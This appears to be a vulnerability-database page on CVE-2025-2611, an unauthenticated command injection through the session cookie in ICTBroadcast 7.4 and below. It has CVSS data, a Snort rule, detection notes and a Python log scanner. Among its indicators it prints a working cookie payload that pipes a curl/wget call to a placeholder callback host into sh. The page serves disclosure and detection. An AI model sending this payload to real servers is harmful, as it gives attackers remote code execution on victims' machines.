CVE-2025-2611
published 2025-08-05


Priority: P185, critical, 9.3 (CVSS 4.0)
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 6.08% (92.5th percentile)
The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling. Versions 7.4 and below are known to be vulnerable.

Affected (1 range)

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ict_innovations | ictbroadcast | <= 7.4 | |

Detection & IOCs (extracted from sources)

cookie: BROADCAST=<payload>
command: `echo${IFS}{{base64('curl -s {{interactsh-url}} || wget -qO- {{interactsh-url}}')}}|base64${IFS}-d|sh`
snort:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ICTBroadcast Command Injection (CVE-2025-2611)"; flow:established,to_server; http.cookie; content:"BROADCAST|3d|"; pcre:"/^[^\x3b]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,www.vulncheck.com/blog/ictbroadcast-kev; reference:cve,2025-2611; classtype:web-application-attack; sid:2065259; rev:1;)
  • The exploit targets GET /login.php with a malicious session cookie value containing shell metacharacters (backtick, pipe, semicolon, dollar sign, newline). The cookie name is the one the server sets (observed as BROADCAST=).
  • Detect shell injection characters in the BROADCAST cookie: semicolons (;/%3B), newlines (\x0a/%0A), backticks (`/%60), pipes (|/%7C), or dollar signs ($/%24) using the Emerging Threats PCRE pattern.
  • Shodan query for exposed ICTBroadcast instances to identify attack surface.
  • The exploit is unauthenticated — no prior session or credentials are required. Exploitation is confirmed by an out-of-band DNS callback (interactsh), so monitor for unexpected DNS/HTTP callbacks from web server processes.
  • The exploit first probes GET /login.php to harvest the server-issued cookie name, then replays the same endpoint with the injected cookie. Two sequential requests to /login.php from the same source with differing cookie values are a strong behavioral signal.
  • Versions 7.4 and below are confirmed vulnerable; the exact cookie name harvested from the server may vary, but the ET rule anchors on the 'BROADCAST=' prefix.
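
The two signals above (shell metacharacters in the BROADCAST cookie, and a changed cookie on a repeated GET /login.php from one source) can also be checked offline against web logs. The following is an added example, not code from the page's sources or from the ET ruleset; the record layout, function names, and sample rows are assumptions constructed for illustration.

```python
from urllib.parse import unquote

# Characters the ET rule looks for, raw or percent-encoded: ; newline ` | $
SHELL_META = set(";\n`|$")
COOKIE_NAME = "BROADCAST"  # observed name; the page notes it may vary per server


def suspicious_chars(cookie_header, name=COOKIE_NAME):
    """Return the sorted shell metacharacters found in the named cookie's value."""
    for pair in cookie_header.split(";"):
        key, _, value = pair.strip().partition("=")
        if key == name:
            # A raw ';' ends the pair in this parser, so only %3B is seen here.
            return sorted(SHELL_META & set(unquote(value)))
    return []


def scan(records):
    """records: iterable of (src_ip, method, path, cookie_header) tuples.

    Returns (src_ip, kind, chars) findings. kind is 'probe_then_inject' when
    the same source already requested /login.php with a different cookie
    header, otherwise 'metachar'.
    """
    last_cookie = {}
    findings = []
    for src, method, path, cookie in records:
        if method != "GET" or path.split("?")[0] != "/login.php":
            continue
        hits = suspicious_chars(cookie)
        if hits:
            replay = src in last_cookie and last_cookie[src] != cookie
            kind = "probe_then_inject" if replay else "metachar"
            findings.append((src, kind, hits))
        last_cookie[src] = cookie
    return findings


# Constructed sample records (documentation IP ranges, placeholder values).
SAMPLE = [
    ("198.51.100.7", "GET", "/login.php", ""),                   # probe, no cookie
    ("198.51.100.7", "GET", "/login.php", "BROADCAST=%60x%60"),  # encoded backticks
    ("203.0.113.5", "GET", "/login.php", "BROADCAST=9f2c1ab34d; lang=en"),
    ("203.0.113.5", "GET", "/login.php", "BROADCAST=9f2c1ab34d; lang=en"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Because the cookie name may vary per server, pass the name your deployment actually issues via the `name` parameter of `suspicious_chars` when it is not BROADCAST.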

CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v4.0 | 9.3 | CRITICAL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| vulncheck | | 9.3 | CRITICAL | |
| vendor_redhat | | 5.5 | MEDIUM | |